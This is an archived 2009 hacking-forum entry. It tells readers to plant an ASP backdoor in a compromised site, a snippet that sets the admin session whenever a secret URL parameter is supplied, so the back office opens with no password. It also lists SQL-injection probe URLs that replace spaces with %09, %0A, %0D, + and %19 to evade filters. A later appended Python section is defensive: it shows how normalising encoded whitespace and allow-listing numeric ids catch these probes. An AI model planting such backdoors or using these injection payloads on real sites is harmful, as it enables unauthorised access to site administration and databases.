Using a webshell to enter the back office directly without a password, and replacing spaces in SQL injection

2009-03-28T00:00:00
ID MYHACK58:62200922688
Type myhack58
Reporter Anonymous
Modified 2009-03-28T00:00:00

Description

First of all, we upload a Trojan and, by downloading the database or some other method, get the administrator's user name. Then find an ASP file and add the following in the middle of it:

dim id
id = trim(request("qwe"))
if id = "120" then
    session("AdminName") = "administrator user name"
end if

Then, when visiting this ASP file, append ?qwe=120 to the URL.

Then open the back-office page: you go straight in, without having to enter a user name and password. This saves us the step of cracking the MD5 password.

The usual form is:

http://www.xxx.com/shownotice.asp?id=78 and 1=1

In fact, %09, %0A, %0D and + can all be used in place of spaces. For example:

http://www.xxx.com/shownotice.asp?id=78%09and%091=1
http://www.xxx.com/shownotice.asp?id=78%0Aand%0A1=1
http://www.xxx.com/shownotice.asp?id=78%0Dand%0D1=1
http://www.xxx.com/shownotice.asp?id=78+and+1=1

In SQL Server 2000 the following can also be used as replacements: %01 %20. For example:

http://www.xxx.com/shownotice.asp?id=78%19and%191=1
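
An added example, not part of the original article: a Python sketch of why a filter keyed on a literal space or %20 misses these variants, and how normalising space-like bytes before matching, or allow-listing a numeric id, catches them. The function names, the signature pattern and the generalisation to every byte from 0x01 to 0x20 are assumptions made for this example; the sample URLs are constructed from the forms in the text.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Space stand-ins from the text (%09, %0A, %0D, %19, +), generalised here
# (assumption) to every byte 0x01-0x20, all collapsed to one plain space.
SPACE_LIKE = re.compile(rb"[\x01-\x20]+")
# Small illustrative signature: a boolean test such as "and 1=1".
BOOLEAN_PROBE = re.compile(rb"\b(?:and|or) \d+ ?= ?\d+", re.I)
# What a numeric id parameter should look like after decoding.
NUMERIC_ID = re.compile(rb"id=[0-9]{1,9}")

# Constructed sample requests built from the URL forms shown above.
SAMPLE_URLS = [
    "http://www.xxx.com/shownotice.asp?id=78",
    "http://www.xxx.com/shownotice.asp?id=78%20and%201=1",
    "http://www.xxx.com/shownotice.asp?id=78%09and%091=1",
    "http://www.xxx.com/shownotice.asp?id=78%0Aand%0A1=1",
    "http://www.xxx.com/shownotice.asp?id=78%0Dand%0D1=1",
    "http://www.xxx.com/shownotice.asp?id=78+and+1=1",
    "http://www.xxx.com/shownotice.asp?id=78%19and%191=1",
]


def naive_match(url: str) -> bool:
    """A filter that only looks for a literal space or %20 around 'and'."""
    return re.search(r"(?: |%20)and(?: |%20)", urlsplit(url).query, re.I) is not None


def normalise(url: str) -> bytes:
    """Percent-decode the query and collapse every space-like byte to ' '."""
    decoded = unquote_to_bytes(urlsplit(url).query.replace("+", " "))
    return SPACE_LIKE.sub(b" ", decoded)


def is_probe(url: str) -> bool:
    """Signature match on the normalised query."""
    return BOOLEAN_PROBE.search(normalise(url)) is not None


def id_is_numeric(url: str) -> bool:
    """Allow-list check: the decoded query must be exactly id=<digits>."""
    return NUMERIC_ID.fullmatch(unquote_to_bytes(urlsplit(url).query)) is not None


def report(urls=SAMPLE_URLS):
    """Return (url, naive_match, is_probe, id_is_numeric) for each request."""
    return [(u, naive_match(u), is_probe(u), id_is_numeric(u)) for u in urls]


if __name__ == "__main__":
    for row in report():
        print(row)
```

The allow-list check is the more robust control, since it rejects anything that is not a plain number regardless of which byte stands in for the space.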